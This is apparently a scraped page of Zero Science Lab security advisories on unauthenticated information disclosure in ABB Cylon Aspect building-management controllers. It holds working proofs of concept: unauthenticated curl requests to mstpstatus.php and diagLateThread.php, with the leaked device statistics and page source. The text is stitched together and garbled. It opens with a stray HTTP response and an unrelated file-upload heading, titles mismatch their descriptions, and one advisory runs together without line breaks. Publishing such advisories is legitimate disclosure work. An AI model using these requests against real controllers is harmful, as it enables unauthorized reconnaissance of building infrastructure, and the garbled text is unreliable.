\> 5GB_CONTENT\> ------J0X--\> "HTTP/1.1 302 FoundStrict-Transport-Security: max-age=31536000; includeSubdomainsExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheLocation: fileSystemUpdateExecuteDisplay.php?file=test.aamContent-type: text/html; charset=UTF-8Content-Length: 0Date: Thu, 28 Nov 2024 15:05:44 GMT

ABB Cylon Aspect 3.08.00 fileSystemUpdate.php File Upload / Denial Of Service

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose various BACnet MS/TP statistics running on the device.

  
ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated information  
disclosure vulnerability. An unauthorized attacker can reference the affected  
page and disclose various BACnet MS/TP statistics running on the device.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5865  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5865.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl http://192.168.73.31/mstpstatus.php  
Thu Nov 28 10:13:51 UTC 2024<br><div id='Port 0Stat' class='portStats'><div id='Port 0Load'>Port 0 Load: 123    Average time (ms) to wait for token return  
47      Average time (ms) to wait for for a reply  
20      Max info frames  
1063    Estimated time for max_nfo_frmaes tx plus token cycle (ms)  
18      Estimated max rate (trasactions per sec)  
38      congestion threashold  
%</div><div id='Port 0BPSTotal'>Port 0 BPS (Total): </div><div id='Port 0BPSOurs'>Port 0 BPS (Mine): </div></div><div id='Port 1Stat' class='portStats'><div id='Port 1Load'>Port 1 Load: 34    Average time (ms) to wait for token return  
40      Average time (ms) to wait for for a reply  
20      Max info frames  
834     Estimated time for max_nfo_frmaes tx plus token cycle (ms)  
23      Estimated max rate (trasactions per sec)  
48      congestion threashold  
%</div><div id='Port 1BPSTotal'>Port 1 BPS (Total): </div><div id='Port 1BPSOurs'>Port 1 BPS (Mine): </div></div><br />  
$Id: mstp.ko R_03_05_01 Thu Sep 23 09:30:32 EDT 2021 $ <br />  
Proto:          0<br />  
<br />  
Port 0 Statistics =======================<br />  
Baud Rate:        38400<br />  
RX Characters:     60521<br />  
RX echoes:         0<br />  
RX Errors:         31<br />  
TX Characters:     49671<br />  
Echo detect fails: 0<br />  
<br />  
Port 0 MSTP State =======================<br />  
ValidRXFrameCnt:   42320<br />  
InvdRXFrameCnt:    61<br />  
rxDataFrames:      16558<br />  
rxToken:           29242<br />  
TXFrameCnt:        2072<br />  
TXQueCnt:          1<br />  
CongestionCnt:     0<br />  
Poll_Station:      0<br />  
SoleMaster:        FALSE<br />  
<br />  
Port 0 config =======================<br />  
Nmax_master:       127<br />  
Nmax_info_frames:  20<br />  
This_Station:      0<br />  
Tno_token:         500<br />  
Tusage timeout     30<br />  
congestion (auto): 38<br />  
Npoll:             50<br />  
<br />  
<br />  
Port 1 Statistics =======================<br />  
Baud Rate:        38400<br />  
RX Characters:     0<br />  
RX echoes:         0<br />  
RX Errors:         0<br />  
TX Characters:     33632<br />  
Echo detect fails: 0<br />  
<br />  
Port 1 MSTP State =======================<br />  
ValidRXFrameCnt:   0<br />  
InvdRXFrameCnt:    0<br />  
rxDataFrames:      0<br />  
rxToken:           0<br />  
TXFrameCnt:        2<br />  
TXQueCnt:          0<br />  
CongestionCnt:     0<br />  
Poll_Station:      29<br />  
SoleMaster:        TRUE<br />  
<br />  
Port 1 config =======================<br />  
Nmax_master:       127<br />  
Nmax_info_frames:  20<br />  
This_Station:      0<br />  
Tno_token:         500<br />  
Tusage timeout     30<br />  
congestion (auto): 48<br />  
Npoll:             50<br />  
<br />

ABB Cylon Aspect 3.08.01 mstpstatus.php Information Disclosure

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose various protocol thread information running on the device.

    ABB Cylon Aspect 3.08.01 (diagLateThread.php) Information DisclosureVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an unauthenticated informationdisclosure vulnerability. An unauthorized attacker can reference the affectedpage and disclose various protocol thread information running on the device.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5864Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5864.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -s http://192.168.73.31/diagLateThread.php | findstr /spina:d "Summary Thread"7:    <title>Thread Class Status</title>47:        #ProjectThreadStatus {127:        var url ='//192.168.73.31/jsonProxy.php?port=7226&application=StatusServlet&query=showTimerThreadPoolStatus%3Dtrue%26descending%3Dtrue%26responseFormat%3Djson';128:        var directUrl ='//192.168.73.31:7226/servlets/StatusServlet?showTimerThreadPoolStatus=true&descending=true&responseFormat=json';203:            $.getJSON(url, processThreadInfo);204:            //$.getJSON(directUrl, processThreadInfo);248:            //infoText = "<div><h2 class='summaryHeading'>"+targetClass+" Class Summary</h2></div><div class='hideable'><div class='summaryInfo'></div>306:        function processThreadInfo(json) {308:            getClassStats(json, PUP_STR, pupLateTime, "PUPLateTable", "pupSummary");309:            getClassStats(json, BACNET_STR, bacnetLateTime, "BACnetLateTable", "bacnetSummary");310:            getClassStats(json, SDP_STR, sdpLateTime, "SDPLateTable", "sdpSummary");311:            getClassStats(json, SCHEDULE_STR, scheduleLateTime, "ScheduleLateTable", "scheduleSummary");312:            getClassStats(json, DEFAULT_STR, defaultLateTime, "DefaultLateTable", "defaultSummary");315:            $("#ProjectThreadStatus").empty();316:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'><h2>Thread Status at " + systemTime.toTimeString() + "</h2></div>");317:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Timers: " + json.totalTimers + "</div>");318:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Targets: " + json.totalTargets + "</div>");323:            var warningTime = (timebase * 1000) * threadWarnPercent;324:            var errorTime = (timebase * 1000) * threadErrorPercent;534:    <div id="ProjectThreadStatus"></div>537:        <div class='infoSection ThreadDiv' id="bacnetInfo">538:            <div id="bacnetHeading"><h2>BACnet Summary</h2>541:                    <div id="bacnetSummary"></div>550:        <div class='infoSection ThreadDiv' id="pupInfo">551:            <div id="pupHeading"><h2>PUP Summary</h2>554:                    <div id="pupSummary"></div>563:        <div class='infoSection ThreadDiv' id="sdpInfo">564:            <div id="sdpHeading"><h2>SDP Summary</h2>567:                    <div id="sdpSummary"></div>576:        <div class='infoSection ThreadDiv' id="scheduleInfo">577:            <div id="scheduleHeading"><h2>Schedule Summary</h2>580:                    <div id="scheduleSummary"></div>589:        <div class='infoSection ThreadDiv' id="defaultInfo">590:            <div id="defaultHeading"><h2>Default Summary</h2>593:                    <div id="defaultSummary"></div>